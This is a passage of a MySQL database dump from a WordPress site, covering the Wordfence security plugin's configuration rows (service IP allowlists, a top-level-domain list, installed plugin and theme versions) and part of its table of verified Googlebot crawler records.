f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),('previousWflogsFileList','[\"rules.php\",\"config-synced.php\",\"config-livewaf.php\",\"GeoLite2-Country.mmdb\",\".htaccess\",\"config-transient.php\",\"template.php\",\"ips.php\",\"config.php\",\"attack-data.php\"]','yes'),('diagnosticsWflogsRemovalHistory','[[1541597540,[\"wafRules.rules\"]]]','yes'),('alertOn_scanIssues','1','yes'),('alertOn_severityLevel','25','yes'),('scansEnabled_geoipSupport','1','yes'),('config720Migration','1','yes'),('lastError_rate_geoip','1555637228','yes'),('lastError_prev_geoip','[1555637228,\"Undefined offset: 101\"]','yes'),('alertOn_wafDeactivated','1','yes'),('scansEnabled_wafStatus','1','yes'),('showWfCentralUI','1','yes'),('waf_status','enabled','yes'),('allowLegacy2FA','0','yes'),('needsNewTour_loginsecurity','1','yes'),('needsUpgradeTour_loginsecurity','0','yes'),('tldlist','|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|cbs|ceb|ceo|cfa|cfd|cpa|crs|csc|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|how|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jcp|jio|jll|jmp|jnj|jot|joy|kfh|kia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|off|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|qvc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|sca|scb|ses|sew|sex|sfr|ski|sky|soy|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|adac|aero|aigo|akdn|ally|amex|arab|army|arpa|arte|asda|asia|audi|auto|baby|band|bank|bbva|beer|best|bike|bing|blog|blue|bofa|bond|book|buzz|cafe|call|camp|care|cars|casa|case|cash|cern|coffee|capetown|cbre|chat|citi|city|club|cool|coop|cyou|canon|data|camera|date|deal|calvinklein|cancerresearch|dclk|dell|bugatti|dish|brussels|budapest|desi|brother|build|docs|dvag|erni|fiat|fido|film|free|fund|game|gbiz|gallery|gent|ggee|gift|builders|diet|duck|fage|fail|fans|business|farm|fast|fire|fish|flir|food|ford|gmbh|gold|golf|goog|guge|guru|hair|haus|hdfc|broker|host|ieee|imdb|immo|info|jobs|cheap|click|claims|jeep|cisco|church|circle|clinic|cloud|java|chrome|itau|citic|coach|capital|chase|cityeats|capitalone|caravan|cards|career|careers|clubmed|clinique|clothing|here|hgtv|cleaning|help|hsbc|caseih|casino|charity|citadel|broadway|catering|catholic|center|chanel|channel|chintai|cipriani|icbc|christmas|jprs|link|loft|love|ltda|luxe|maif|ollo|open|adult|loan|actor|live|page|pars|aetna|baidu|abarth|abbott|alipay|android|anquan|apple|abbvie|airtel|alibaba|aramco|athleta|alfaromeo|archi|auspost|airforce|like|limo|africa|amica|audio|azure|abogado|agakhan|agency|auction|abudhabi|academy|airbus|attorney|audible|accenture|bradesco|pccw|autos|allfinanz|amfam|menu|boats|bosch|accountant|accountants|bible|bingo|black|afamilycompany|americanfamily|meet|meme|mini|mint|alstom|analytics|aquarelle|americanexpress|name|navy|allstate|alsace|amazon|amsterdam|apartments|moto|associates|news|next|beats|mobi|moda|nico|nike|author|bridgestone|codes|kddi|kpmg|life|nikon|ping|pink|ninja|nokia|play|bayern|kiwi|kred|nowtv|plus|beauty|lidl|bauhaus|bargains|baseball|basketball|bentley|land|berlin|nexus|bloomberg|booking|boehringer|lego|bharti|bnpparibas|bostik|nissay|blackfriday|boston|nagoya|natura|bestbuy|netbank|boutique|neustar|blockbuster|lgbt|netflix|nextdirect|nissan|nationwide|network|newholland|northwesternmutual|pics|norton|nowruz|observer|pohl|office|qpon|osaka|online|banamex|paris|barcelona|phone|oracle|avianca|photo|otsuka|photos|physio|okinawa|orange|pictet|barclays|macys|omega|olayan|oldnavy|organic|parts|party|racing|philips|quebec|radio|partners|pharmacy|pictures|quest|pfizer|barefoot|origins|panasonic|poker|passagens|plumbing|politie|porn|post|place|pramerica|praxi|press|protection|prudential|barclaycard|prime|onyourside|pizza|pioneer|photography|prod|playstation|productions|prof|progressive|promo|property|bananarepublic|olayangroup|properties|raid|college|rsvp|dubai|rent|rest|rich|rmit|deals|delta|room|earth|edeka|email|forex|ruhr|finance|financial|safe|epson|events|sale|glade|expert|reit|sarl|save|glass|emerck|gripe|dunlop|dupont|durban|green|energy|insure|fishing|intel|estate|gratis|intuit|fitness|grocery|firmdale|globo|health|firestone|read|gmail|gucci|grainger|group|graphics|guardian|guide|guitars|hangout|irish|hamburg|hdfcbank|saxo|dance|sexy|crown|shaw|shia|shop|show|silk|sina|site|skin|sncf|sohu|song|sony|star|surf|talk|town|toys|tube|cymru|dabur|cologne|drive|seek|fedex|games|homes|house|scot|gallo|taxi|hermes|hotels|imamat|homesense|horse|hiphop|seat|helsinki|honda|hughes|hyatt|team|forum|hisamitsu|hockey|tech|faith|ikano|family|gifts|healthcare|holiday|teva|hitachi|fidelity|tiaa|tips|final|gives|holdings|homedepot|homegoods|iveco|spot|lamer|coupon|kyoto|work|jetzt|lease|credit|legal|lexus|dealer|foundation|fresenius|futbol|koeln|degree|george|genting|lilly|linde|lipsy|money|shell|shoes|skype|wien|lixil|lupin|sling|smart|space|stada|study|weir|sport|style|cruise|lotto|media|smile|wine|sucks|wiki|loans|sener|solar|dating|kindle|sharp|datsun|living|locus|london|miami|movie|seven|giving|locker|lotte|swiss|xbox|zara|zone|tatar|zero|comsec|wang|condos|direct|doctor|flickr|gallup|google|joburg|juegos|kaufen|kinder|kosher|lancia|watch|xerox|frontier|jaguar|weber|dental|design|garden|global|lawyer|frogans|latino|weibo|frontdoor|lefrak|yahoo|fujitsu|yoga|fujixerox|world|furniture|works|luxury|mango|market|moscow|toray|realty|rehab|reise|total|reisen|tours|mobile|mormon|visa|repair|trade|monash|trust|football|tunes|tushu|florist|madrid|maison|makeup|museum|mutual|flights|mattel|ubank|vegas|flowers|goodyear|goldpoint|vana|godaddy|foodnetwork|video|viva|report|voto|ricoh|rocks|rodeo|rugby|rocher|rogers|ryukyu|safety|sakura|salon|search|tires|tirol|secure|forsale|review|sanofi|school|schule|wales|select|shouji|soccer|social|storage|vivo|vote|store|stream|studio|supply|suzuki|swatch|support|surgery|sydney|systems|supplies|symantec|swiftcover|tmall|today|tokyo|tools|vodka|volvo|taipei|tienda|contact|tjmaxx|tkmaxx|toyota|travel|cooking|corsica|tennis|contractors|cookingchannel|unicom|villas|voting|comcast|commbank|community|company|viajes|viking|virgin|vision|voyage|vuelos|walter|webcam|xihuan|yachts|compare|zappos|computer|construction|consulting|yandex|country|coupons|courses|cricket|cruises|dentist|digital|domains|farmers|fashion|jewelry|creditcard|juniper|kitchen|komatsu|lacaixa|creditunion|directory|lanxess|discount|discover|leclerc|limited|metlife|download|jpmorgan|lasalle|latrobe|lincoln|markets|engineer|marriott|science|shiksha|lundbeck|wedding|maserati|mckinsey|showtime|windows|cuisinella|stcgroup|whoswho|shopping|winners|delivery|deloitte|democrat|diamonds|lighting|memorial|merckmsd|services|xfinity|woodside|education|ericsson|hosting|etisalat|equipment|exposed|express|ferrero|hoteles|hotmail|monster|reviews|rexroth|samsung|sandvik|schmidt|staples|yamaxun|youtube|zuerich|exchange|ferrari|hyundai|realtor|schwarz|fairwinds|hospital|infiniti|ismaili|istanbul|marketing|rentals|institute|insurance|kuokgroup|lifestyle|marshalls|melbourne|recipes|scjohnson|shangrila|shriram|feedback|ipiranga|mortgage|microsoft|singles|lancaster|landrover|mitsubishi|redstone|reliance|saarland|softbank|xn--90ae|motorcycles|xn--p1ai|yokohama|richardli|samsclub|security|software|solutions|statebank|statefarm|spreadbetting|xn--node|xn--qxam|stockholm|eurovision|extraspace|immobilien|investments|republican|restaurant|redumbrella|rightathome|taobao|industries|target|trading|training|travelers|xn--j1aef|schaeffler|tattoo|toshiba|website|xn--90ais|xn--c1avg|xn--d1alf|xn--e1a4c|xn--fhbei|tatamotors|international|technology|temasek|theater|theatre|tickets|vacations|vanguard|ventures|verisign|walmart|wanggou|watches|weather|scholarships|tiffany|xn--czrs0t|xn--czru2d|xn--fiq64b|xn--fiqs8s|xn--d1acj3b|sandvikcoromant|xn--czr694b|weatherchannel|xn--g2xx48c|xn--eckvdtc9d|xn--efvy88h|xn--fct429k|xn--fiqz9s|xn--fjq720a|xn--flw351e|xn--io0a7i|xn--gecrj9c|xn--fiq228c5hs|xn--imr513n|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--h2brj9c8c|xn--fzys8d69uvgm|xn--gckr3f0f|xn--gk3at1e|xn--h2breg3eve|xn--h2brj9c|xn--hxt814e|xn--i1b6b1a6a2e|xn--j1amh|lamborghini|realestate|xn--30rr7y|enterprises|xn--3bst00m|xn--kput3i|xn--l1acc|engineering|kerryhotels|xn--3ds443g|kerrylogistics|kerryproperties|xn--mgbcpq6gpa1a|xn--ngbrx|management|xn--cg4bki|xn--mgbgu82a|xn--qxa6a|lplfinancial|lifeinsurance|xn--mgberp4a5d4ar|xn--nqv7f|xn--p1acf|xn--mgbi4ecexp|xn--mgbpl2fh|xn--mgbt3dhd|xn--mgbtx2b|xn--mk1bu44c|xn--mgbx4cd0ab|xn--mix891f|xn--tckwe|xn--vhquv|travelersinsurance|university|versicherung|vlaanderen|volkswagen|xn--11b4c3d|xn--1ck2e1b|xn--90a3ac|xn--9dbq2a|xn--c2br7g|williamhill|xn--9et52u|xn--1qqw23a|xn--2scrj9c|xn--80aswg|wolterskluwer|xn--45q11c|xn--55qx5d|xn--5tzm5g|yodobashi|xn--3pxu8k|xn--4gbrim|xn--mgbca7dzdo|xn--clchc0ea0b2g2a9gcd|xn--mxtq1m|xn--42c2d9a|xn--45brj9c|xn--55qw42g|xn--6frz82g|xn--9krt00a|xn--jvr189m|xn--wgbl6a|xn--3e0b707e|xn--3hcrj9c|xn--45br5cyl|xn--3oq18vl8pn36a|xn--cck2b3b|xn--j6w193g|xn--54b7fta0cc|xn--jlq480n2rg|xn--jlq61u9w7b|xn--kcrx77d1x4a|xn--5su34j936bgsg|xn--y9a3aq|xn--6qq986b3xl|xn--80adxhks|xn--80ao21a|xn--kprw13d|xn--kpry57d|xn--80asehdb|xn--8y0a063a|travelchannel|xn--cckwcxetd|xn--mgbbh1a|xn--mgbayh7gpa|xn--yfro4i67o|xn--b4w605ferd|xn--ygbi2ammx|xn--zfr164b|xn--80aqecdr1a|xn--mgbbh1a71e|xn--bck1b9a5dre4c|xn--kpu716f|xn--mgb9awbf|xn--mgbab2bd|xn--mgba3a3ejt|xn--mgbaam7a8h|xn--lgbbat1ad8j|xn--mgba3a4f16a|xn--mgbaakc7dvf|xn--xhq521b|xn--mgbc0a9azcg|xn--q7ce6a|xn--wgbh1c|xn--mgba7c0bbn0a|xn--mgbah1a3hjkrd|xn--mgbai9azgqp6j|xn--ngbc5azd|xn--ngbe9e0a|xn--nqv7fs00ema|xn--nyqy26a|xn--o3cw4h|xn--ogbpf8fl|xn--otu796d|xn--pbt977c|xn--pgbs0dh|xn--pssy2u|xn--q9jyb4c|xn--w4rs40l|xn--qcka1pmc|xn--rhqv96g|xn--rovu88b|xn--rvc1e0am3e|xn--s9brj9c|xn--ses554g|xn--t60b56a|xn--unup4y|xn--tiq49xqyj|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--vuq861b|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--w4r85el8fhu5dnra|','yes'),('tldlistHash','cd755cb00316d6e7dcd9fa76f81f5aef471f69eb7794b12f72b0607f800292b7','yes'),('wordpressVersion','5.5.1','yes'),('wordpressPluginVersions','a:22:{s:7:\"akismet\";s:5:\"4.1.7\";s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"4.4.4\";s:7:\"booking\";s:6:\"8.7.10\";s:16:\"booking-calendar\";s:5:\"2.7.0\";s:24:\"child-theme-configurator\";s:5:\"2.5.6\";s:14:\"classic-editor\";s:3:\"1.6\";s:17:\"devices-elementor\";s:5:\"1.0.4\";s:14:\"duplicate-page\";s:3:\"4.3\";s:9:\"elementor\";s:6:\"3.0.12\";s:41:\"addon-elements-for-elementor-page-builder\";s:5:\"1.7.1\";s:5:\"hello\";s:5:\"1.7.2\";s:9:\"ml-slider\";s:6:\"3.18.7\";s:17:\"siteorigin-panels\";s:6:\"2.11.5\";s:14:\"press-elements\";s:5:\"1.7.2\";s:17:\"really-simple-ssl\";s:5:\"3.3.5\";s:17:\"so-widgets-bundle\";s:6:\"1.17.8\";s:26:\"ssl-insecure-content-fixer\";s:5:\"2.7.2\";s:10:\"tablepress\";s:4:\"1.12\";s:11:\"updraftplus\";s:7:\"1.16.33\";s:9:\"wordfence\";s:6:\"7.4.12\";s:12:\"wpforms-lite\";s:7:\"1.6.3.1\";s:13:\"wordpress-seo\";s:4:\"15.2\";}','yes'),('wordpressThemeVersions','a:8:{s:13:\"twentyfifteen\";s:3:\"2.7\";s:14:\"twentyfourteen\";s:3:\"2.9\";s:15:\"twentyseventeen\";s:3:\"2.4\";s:13:\"twentysixteen\";s:3:\"2.2\";s:10:\"university\";s:3:\"1.3\";s:13:\"vantage-child\";s:14:\"1.0.1459119848\";s:7:\"vantage\";s:3:\"2.6\";s:10:\"zerif-lite\";s:8:\"1.8.5.49\";}','yes');
/*!40000 ALTER TABLE `ar_wfConfig` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfCrawlers`
--

DROP TABLE IF EXISTS `ar_wfCrawlers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfCrawlers` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  `PTR` varchar(255) DEFAULT '',
  PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfCrawlers`
--

LOCK TABLES `ar_wfCrawlers` WRITE;
/*!40000 ALTER TABLE `ar_wfCrawlers` DISABLE KEYS */;
INSERT INTO `ar_wfCrawlers` VALUES ('\0\0\0\0\0\0\0\0\0\0BF@','>b0oQ1','verified',1605285662,'crawl-66-249-70-64.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1604904484,'crawl-66-249-64-164.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1605385327,'crawl-66-249-64-176.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB0','>b0oQ1','verified',1604233601,'crawl-66-249-66-48.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB.','>b0oQ1','verified',1604149025,'crawl-66-249-66-46.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB*','>b0oQ1','verified',1604046230,'crawl-66-249-66-42.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1603990800,'crawl-66-249-66-140.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B\\V','>b0oQ1','verified',1603778047,'rate-limited-proxy-66-249-92-86.google.com'),('\0\0\0\0\0\0\0\0\0\0B\\P','>b0oQ1','verified',1603144685,'rate-limited-proxy-66-249-92-80.google.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1604357471,'crawl-66-249-64-168.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1602783451,'crawl-66-249-64-7.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BO','>b0oQ1','verified',1602692943,'crawl-66-249-79-132.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BY','>b0oQ1','verified',1605046322,'rate-limited-proxy-66-249-89-15.google.com'),('\0\0\0\0\0\0\0\0\0\0BY','>b0oQ1','verified',1605046320,'rate-limited-proxy-66-249-89-23.google.com'),('\0\0\0\0\0\0\0\0\0\0BF&','>b0oQ1','verified',1602012764,'crawl-66-249-70-38.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF2','>b0oQ1','verified',1601995306,'crawl-66-249-70-50.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1601995304,'crawl-66-249-64-216.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1601995303,'crawl-66-249-64-218.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BBU','>b0oQ1','verified',1601924035,'crawl-66-249-66-85.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B\\R','>b0oQ1','verified',1603144687,'rate-limited-proxy-66-249-92-82.google.com'),('\0\0\0\0\0\0\0\0\0\0B\\N','>b0oQ1','verified',1603778045,'rate-limited-proxy-66-249-92-78.google.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1604192505,'crawl-66-249-66-144.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1601735025,'crawl-66-249-64-144.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF','>b0oQ1','verified',1601695840,'crawl-66-249-70-20.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BY&','>b0oQ1','verified',1601215974,'rate-limited-proxy-66-249-89-38.google.com'),('\0\0\0\0\0\0\0\0\0\0#o','i| OoD!','verified',1601038723,''),('\0\0\0\0\0\0\0\0\0\0#o','>b0oQ1','badPTR',1601038723,'35.187.132.111'),('\0\0\0\0\0\0\0\0\0\0#d','i| OoD!','verified',1601038718,''),('\0\0\0\0\0\0\0\0\0\0#d','>b0oQ1','badPTR',1601038718,'35.187.132.100'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1603786434,'crawl-66-249-66-142.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1604171312,'crawl-66-249-66-148.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1604171505,'crawl-66-249-66-146.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1604134656,'crawl-66-249-66-150.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1600827516,'crawl-66-249-66-154.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BBV','>b0oQ1','verified',1601924293,'crawl-66-249-66-86.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BBT','>b0oQ1','verified',1604538507,'crawl-66-249-66-84.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BY%','>b0oQ1','verified